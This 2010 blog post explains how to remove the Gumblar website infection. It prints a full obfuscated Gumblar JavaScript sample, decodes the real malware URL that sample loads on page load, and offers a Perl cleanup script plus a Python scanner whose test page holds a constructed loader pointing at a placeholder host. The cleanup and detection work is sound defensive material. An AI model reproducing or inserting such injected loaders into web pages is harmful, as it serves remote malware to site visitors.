Gumblar Virus Javascript removal using PERL

The Gumblar virus infects every .html and .php file it can reach and injects a block of JavaScript into the source code. The injected code is usually found just below the <body> tag. The JavaScript Gumblar injects varies widely from site to site and usually attaches a script element or an inline frame to the page so that it executes on page load. Read on to get rid of this virus.

Gumblar Source Code Sample (reformatted with line breaks)

Sample 1

var D; if(D!='' && D!='X'){D=''}; var U=new Array(); var p=""; function u(){var aY=new Date(); var uV=RegExp; var Q; if(Q!='q'){Q=''}; var N="]"; var kn; if(kn!=''){kn='vn'}; var zN; if(zN!='e' && zN!='vh'){zN='e'}; var r="\x2f\x67\x61\x6e\x6a\x69\x2e\x63\x6f\x6d\x2f\x67\x61\x6e\x6a\x69\x2e\x63\x6f\x6d\x2f\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2f\x61\x6e\x67\x65\x67\x65\x2e\x63\x6f\x6d\x2f\x6b\x69\x6a\x69\x6a\x69\x2e\x63\x61\x2e\x70\x68\x70"; var H=''; function F(d,B){var hE=new Array(); var g; if(g!='Hl' && g != ''){g=null}; var hR; if(hR!='t' && hR!='HX'){hR='t'}; var BK=String("iMc[".substr(3)); BK+=B; var As; if(As!=''){As='sS'}; BK+=N; var WG=''; var TR=''; var S=new uV(BK, new String("7wkg".substr(3))); var K; if(K!='' && K!='eo'){K='HT'}; var pH; if(pH!='' && pH!='ed'){pH='jH'}; return d[new String("rep"+"lac"+"e")](S, H); }; var Rv; if(Rv!='I' && Rv != ''){Rv=null}; var fH; if(fH!='' && fH!='Nu'){fH='Bh'}; var W=F('8955593606965585956650693356','6395'); var Ud=new Date(); var ga=new Array(); var x="src"; var Il=new Array(); var FC=''; var h=window; this.Dk=''; var b; if(b!='ny' && b!='Hn'){b=''}; var sST=new String(); var T=unescape("%68%74%74%70%3a%2f%2f%69%66%65%6e%67%2d%63%6f%6d%2e%63%69%74%69%62%61%6e%6b%2e%63%6f%6d%2e%74%72%69%70%61%64%76%69%73%6f%72%2d%63%6f%6d%2e%6e%65%65%64%73%65%72%76%65%2e%72%75%3a"); var G=''; var P=F('dUeJfHeKrJ','Yq8gMKH0EUJbu'); var PG=new String(); var Gs=new Array(); this.gX=""; h[String("onlo2SzX".substr(0,4)+"ad")]=function(){ var Jm=new Date(); try {a=document.createElement(F('sHcTrviHpTtT','HUvT')); var lA; if(lA!='C'){lA=''}; var Fg=new Date(); FC=T; var fJ; if(fJ!='At'){fJ='At'}; FC+=W; FC+=r; var vW; if(vW!='pO' && vW!='Bp'){vW=''}; var Ic=new Date(); a[x]=FC; var bO; if(bO!='' && bO!='xL'){bO=''}; a[P]=[1][0]; var WW; if(WW!='Xp'){WW=''}; var _t=new String(); var tg=new String(); document.body.appendChild(a); var CB=new Array(); var sO=""; } catch(Y){this.Wl=''; var G_; if(G_!='wP' && G_!='PP'){G_=''}; };}; var 
oH=new Array(); var ow=new Array(); };var Ec; if(Ec!='ho' && Ec!='Jw'){Ec='ho'}; var Hj; if(Hj!='rh' && Hj!='ON'){Hj='rh'}; u(); this.fa=""; var jC; if(jC!='' && jC!='aZ'){jC=null};

The above code adds a script element to the page with the following source: <script src="http://ifeng-com.citibank.com.tripadvisor-com.needserve.ru:8080/ganji.com/ganji.com/google.com/angege.com/kijiji.ca.php" defer=""></script>. The host comes from the unescape() call, the port 8080 from F() stripping the digits 6, 3, 9 and 5 out of a longer digit string, the path from the \x-escaped string r, and the attribute name "defer" from another F() call.

The virus seems to add random domain names to the URL.

Manual Removal Tool (PERL Script)

The Gumblar virus appears in many different forms, so there is no single signature. To remove it, find one page that contains the injected JavaScript, copy that exact block as the virus signature into the script below, and run the script with the web root directory as its input (the script prompts for both values). Download the script, execute it, enter the two details and Gumblar is removed. If you know Perl you can tweak the code to suit your own setup.

No Perl modules beyond the core distribution are required for this script.

#!/usr/bin/perl
use strict;
use warnings;

# Both values are read from standard input; either can instead be
# hard-coded here, for example:  my $gumblar_signature = q{SignatureHere};
print "Enter your web root directory : \n";
chomp(my $home_dir = <STDIN>);
print "Enter Gumblar Signature : \n";
chomp(my $gumblar_signature = <STDIN>);

# File extensions to scan. Add more extensions here if needed.
my %scan_ext = map { $_ => 1 } qw(html php asp aspx js txt);

walkdir($home_dir);

# Recurse through a directory, scanning every file under it.
sub walkdir {
    my $dir = shift;
    opendir(my $dh, $dir) or do { warn "Cannot open $dir: $!\n"; return };
    my @entries = grep { !/^\.\.?$/ } readdir($dh);   # skip only . and ..
    closedir($dh);
    for my $entry (@entries) {
        my $path = "$dir/$entry";
        if (-d $path) { walkdir($path) } else { remove_gumblar($path) }
    }
}

# Strip the signature from one file; the original is kept as $file.infected
# (move those copies out of the web root once you have reviewed them).
sub remove_gumblar {
    my $file = shift;
    print "Testing $file \n";
    return unless $file =~ m/\.([a-z]{3,4})$/ && $scan_ext{$1};
    open(my $in, '<', $file) or do { warn "Cannot read $file: $!\n"; return };
    my $source = do { local $/; <$in> };   # slurp the whole file
    close $in;
    # \Q...\E matches the pasted signature literally, so the regex
    # metacharacters in Gumblar's code ( [ { * + do not need escaping.
    if ($source =~ s/\Q$gumblar_signature\E//sgi) {
        print "Gumblar detected and removed on $file \n";
        rename($file, "$file.infected") or die "Cannot rename $file: $!\n";
        open(my $out, '>', $file) or die "Cannot write $file: $!\n";
        print $out $source;
        close $out;
    }
}
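Because the injected block changes from site to site, it helps to locate it before you have a signature to paste into the script. The following added example (not part of the original post) is a small Python scanner that flags inline scripts hiding URL-like strings behind the \xNN and %NN escapes seen in the sample above, and prints the decoded strings; the sample page, host bad.example and path /loader.php are constructed placeholders.

```python
import re
from typing import Dict, List

# Inline <script> bodies, JS string literals, and the two escape styles the
# Gumblar sample uses: "\x2f..." literals and unescape("%68%74...").
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
STRING_RE = re.compile(r'"((?:[^"\\]|\\.)*)"' + r"|'((?:[^'\\]|\\.)*)'")
HEX_RE = re.compile(r"\\x([0-9a-fA-F]{2})")
PCT_RE = re.compile(r"%([0-9a-fA-F]{2})")
URLISH_RE = re.compile(r"^(https?://|/)\S+", re.I)


def decode_escapes(literal: str) -> str:
    """Turn \\xNN and %NN sequences back into the characters they hide."""
    literal = HEX_RE.sub(lambda m: chr(int(m.group(1), 16)), literal)
    return PCT_RE.sub(lambda m: chr(int(m.group(1), 16)), literal)


def scan_html(html: str, min_escapes: int = 8) -> List[Dict]:
    """Report inline scripts that bury URL-like strings under many escapes."""
    findings = []
    for m in SCRIPT_RE.finditer(html):
        body = m.group(1)
        escapes = len(HEX_RE.findall(body)) + len(PCT_RE.findall(body))
        if escapes < min_escapes:
            continue  # a handful of escapes is normal in legitimate code
        decoded = [decode_escapes(a or b) for a, b in STRING_RE.findall(body)]
        hidden = [s for s in decoded if URLISH_RE.match(s)]
        if hidden:
            findings.append({"offset": m.start(), "escapes": escapes,
                             "hidden": hidden})
    return findings


def scan_file(path: str) -> List[Dict]:
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_html(fh.read())


# Constructed sample page (not the real injection): the same hiding technique
# as the sample above, with placeholder host bad.example and path /loader.php.
INFECTED = r"""<html><body>
<script>var r="\x2f\x6c\x6f\x61\x64\x65\x72\x2e\x70\x68\x70";
var T=unescape("%68%74%74%70%3a%2f%2f%62%61%64%2e%65%78%61%6d%70%6c%65%3a");
window.onload=function(){var a=document.createElement("script");
a.src=T+"8080"+r;document.body.appendChild(a);};</script>
<script>var greeting="\x48i";</script>
<p>hello</p></body></html>"""

if __name__ == "__main__":
    for f in scan_html(INFECTED):
        print(f"script at byte {f['offset']}: {f['escapes']} escapes, "
              f"hidden strings {f['hidden']}")
```

Run scan_file() over each page under the web root; the flagged script block is the text to paste as the signature for the Perl script.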

Please feel free to download, modify and redistribute the source code so that everyone benefits.
Please post your comments below so that everyone can help each other. Happy Removing Gumblar :)

Download the source code from the attachments or copy and paste it from above.

31 Mar, 2010

Attachment: gumblar.pl_.txt (1.3 KB)